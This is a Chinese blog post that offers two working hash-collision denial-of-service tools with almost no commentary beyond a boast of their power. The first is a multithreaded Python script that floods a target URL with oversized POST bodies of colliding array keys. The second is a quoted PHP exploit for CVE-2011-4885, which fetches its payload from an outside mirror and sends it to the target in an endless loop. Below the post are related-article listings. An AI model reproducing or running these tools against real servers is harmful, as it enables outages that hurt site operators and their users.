多语言 hash web dos 代码

最新推荐文章于 2022-01-14 21:10:32 发布
最新推荐文章于 2022-01-14 21:10:32 发布
阅读量1k 收藏
点赞数
分类专栏: 工具源码 python 文章标签: dos 语言 web firing exception domain
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/7410592
版权

不多说。威力巨大。

import threading,argparse,sys,socket,re
import urllib.parse as up

parser = argparse.ArgumentParser(description='Http range Dos tools,by Yatere.')

parser.add_argument('-t',help="Trager's url")
parser.add_argument('-r',default=256,type=int,help="Trager's Threading Number")

args = parser.parse_args()
if args.t ==None:
          parser.print_help()
          sys.exit(1)
          
host=up.urlsplit(args.t).netloc
file=up.urlsplit(args.t).path+up.urlsplit(args.t).query
threadno=args.r
port=80


a=0
txt=''
for i in range(1,32768):
	a=a+32768
	txt=txt+'&array['+str(a)+"]=0"

had='POST /'+file+' HTTP/1.1\r\nHost: '+host+'\r\nAccept: */*\r\nContent-Length: 621444\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n'+txt


class yk(threading.Thread):
          def __init__(self,domain,port=80):
                    super(yk,self).__init__()
                    self.domain=domain
                    self.port=port
                    self.start()

          def run(self):
                    while True:
                              try:  
                                        a=socket.socket()
                                        a.connect((self.domain,self.port))
                                        a.send(had.encode())
                                        a.close()
                                        print('HEADing\n')
                              except Exception as a:
                                        print (a)
                                        pass
                    


                                        
for i in range(threadno):
          yk(host,port)

windows 版本扫后上传


国外另外一个

<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:

http://compsoc.nuigalway.ie/~infodox/hashcollide.txt

http://jrs-s.net/hashcollide.txt

http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>


Yatere
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hashdos_调查HashDoS问题
最佳 Java 编程
06-01 213
hashdos 近一个月前,我就如何在不与供应商互动的情况下临时解决 28C3上出现的HashDoS问题或其他代码缺陷发表了一些想法。 现在是时候更深入地研究复杂性攻击并查看源了。 我完全假设java.util.HashMap和java.util.Hashtable是受此攻击影响的最常用的Java数据结构,因此本文仅将代码集中在这些类型的后面。 哈希函数和索引数据结构的简要介绍 哈希...
使用Hash碰撞进行DoS攻击
zhaohong_bo的专栏
05-22 1884
一、哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表。PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结构存储)。 理想情况下哈希表插入和查找操作的时间复杂度均为O(1),任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值(key),然后...
安全漏洞:hashDos-哈希表多碰撞
我的角落
01-10 177
拉链法是解决Hash冲突问题的方法之一,把所有hash值相同的元素链接在同一个单链表中。这也是jdk中hashmap,hashtable的实现方式。外部拉链法的缺点是:它需要稍微多一些的空间来实现,因为添加任何元素都需要添加指向节点的指针,并且每次探查也要花费稍微多一点的时间,因为它需要间接引用逐一查找匹配,而不是直接访问元素。当大量相同hash值的元素保存时,就会导致链表巨长无比,这时g...
如何防止因哈希碰撞引起的DoS攻击
zwx900102的博客
01-14 1402
哈希是一种相对比较简单的数据结构,而哈希的随机访问元素时间复杂度可以达到 `O(1)` 级别是因为其和数组有着无法分割的联系,开放寻址法和链地址法是用来解决哈希冲突的两种重要措施,但是在使用过程需要防止哈希碰撞攻击。
调查HashDoS问题
最佳 Java 编程
05-08 189
近一个月前,我就如何在不与供应商互动的情况下临时解决 28C3上出现的HashDoS问题或其他代码缺陷发表了一些想法。 现在是时候更深入地研究复杂性攻击并查看来源了。 我完全假设java.util.HashMap和java.util.Hashtable是受此攻击影响的最常用的Java数据结构,因此本文仅将代码集中在这些类型的后面。 哈希函数和索引数据结构的简要介绍 哈希索引数据结构...
C++语言实现hash表详解及实例代码
08-31
在C++中,哈希表(Hash Table)是一种高效的数据结构,它通过使用哈希函数将数据映射到数组的特定位置,实现了快速查找、插入和删除操作。哈希表通常用于存储键值对,其中键经过哈希函数处理后转化为数组索引,值则...
关于Hash Collision DoS漏洞:web实例
03-31
标题中的“Hash Collision DoS漏洞:web实例”指的是在Web应用程序中出现的一种安全问题,即哈希碰撞拒绝服务攻击(Hash Collision Denial of Service)。这种攻击利用了哈希表(Hash Table)数据结构的特性,当两个...
警惕Hash Collision Dos.pdf
01-06
【警惕Hash Collision Dos】这篇文档主要讨论了一种名为“Hash Collision Dos”的网络安全威胁,这种攻击方式利用了哈希表(HashTable)的冲突特性对Web服务器进行拒绝服务(Denial of Service,DoS)攻击。...
Java Hash Collision DoS Attack
03-19
Java实现的Hash Collision DoS Attack
没想到 Hash 冲突还能这么玩,你的服务中招了吗?
程序猿石头的博客
07-05 328
点击上方蓝色字体,关注我 ——一个在阿里云打工的清华学渣!图 by: 石头背景 其实这个问题我之前也看到过,刚好在前几天,洪教授在某个群里分享的一个《一些有意思的攻击手段.pdf》,我觉...
Hash Collision DoS
大树叶 技术专栏
08-19 1382
Hash Collision DoS事件及影响  Hash Collision DoS能让受攻击的服务器变得巨慢无比。 这不是因为服务器的编码原因或是疏忽造成的,而是程序语言自身的问题,Hash Collision DoS利用了各语言Hash算法的“非随机性”可以制造出N多不一样的value,但是key一样数据,然后让Hash表成为一张单向链表,从而导致整个网站或是程序的运行性能以级
[解析]Hash碰撞的拒绝式服务攻击
个人学习记录所用
01-06 727
最近,除了国内明文密码的安全事件,还有一个事是比较大的,那就是Hash Collision DoSHash碰撞的拒绝式服务攻击),有恶意的人会通过这个安全弱点会让你的服务器运行巨慢无比。这个安全弱点利用了各语言Hash算法的“非随机性”可以制造出N多的value不一样,但是key一样数据,然后让你的Hash表成为一张单向链表,而导致你的整个网站或是程序的运行性能以级数下降(可以很轻松的让你的
进程通信概念和进程通信方式
xy913741894的博客
05-08 1万+
进程通信(IPC,Inter-Porcess Communcation)是进程进行通信和同步的机制。IPC提供两个基本操作: 发送(send message) 接收(receive message) 进程通信流程: 在通信进程之间建立通信链路 通过send/receive交换信息 进程通信方式: 直接通信: 进程必须正确命名对方,比如send(p,message)向p发送信息,receiv
WEB安全:HashDos攻击
步行者的专栏
01-06 2591
最近在上网的时候,看到了HashDos攻击的信息。 在http请求中处理大量参数的时候,服务器的hash table出来的时候,由于查询,删除等的操作比较消耗时间。最终使得CPU 100%的状态。 使得服务器几乎失去响应。如果停止攻击的话,马上就能够恢复。这个并不是某个语言的问题。 具体可以参考:http://cryptanalysis.eu/blog/2011/12/28/effectiv
Java并发编程中Semaphore的用法
热门推荐
K.Sun
12-25 2万+
Semaphore又称信号量,是操作系统中的一个概念,在Java并发编程中,信号量控制的是线程并发的数量。public Semaphore(int permits)其中参数permits就是允许同时运行的线程数目;下面先看一个信号量实现单线程的例子,也就是permits=1:package concurrent.semaphore;import java.util.concurrent.Semaph
python 多线程tcp udp发包 Dos工具。
Yatere的天平秤
04-17 7329
现在肉鸡上面linux越来越多,都默认安装了python,有时候没有工具的时候可以自己写一个: 下面是支持 tcp和udp的python的发包代码: import socket,sys,threading if len(sys.argv)!=4: print('使用方法:\n'+sys.argv[0],'目标ip','协议[tcp | udp]','线程数')
icmp (http) 隧道技术
Yatere的天平秤
04-18 3522
实验环境如下: 服务器IP:61.183.254.254 客户机IP:192.168.1.105 Http代理服务器:202.103.24.68  端口:8080 现象:    客户机可以ping得通外网服务器,但是却无法上网,出口过滤tcp和udp。 目的: 客户机可以正常上网。 服务器: C:\>ptunnel.exe -v 4 -c "\Device\NPF_{
dns服务器 、dns中间人篡改服务器
Yatere的天平秤
01-30 3259
软件介绍:  本身为独立执行程序,跨平台,可以充当正常dns服务器。默认情况下,本程序只篡改MX(邮件交换记录)为特定主机。 作用: 本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。 其他: 如果需要实现高级的基于特定域名的篡改,修改代码即可。 package main import ( "fmt" "github.
python 自动采集域名whois 信息。
Yatere的天平秤
03-06 3059
以前写了一个基于socket的,但是经常要连接不同whois服务器,有些信息还不全。 这次直接基于中国站长网,由于目标页面有js动态操作,所以只能使用pam模块了。 下面是介绍: 吧域名每行一个的写入脚本所在程序目录下的dns.txt,然后运行以下脚本。 程序自动为每个域名生成单独htm文件,放于同目录下。 pam 和 BeautifulSoup 参考我博客可以找到 B
加法hash函数Python代码
最新发布
05-22
下面是一个Python实现的加法哈希函数示例代码: ```python def add_hash(key, size, offset): hash_val = offset for char in key: hash_val += ord(char) return hash_val % size ``` 其中,`key`是要计算...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值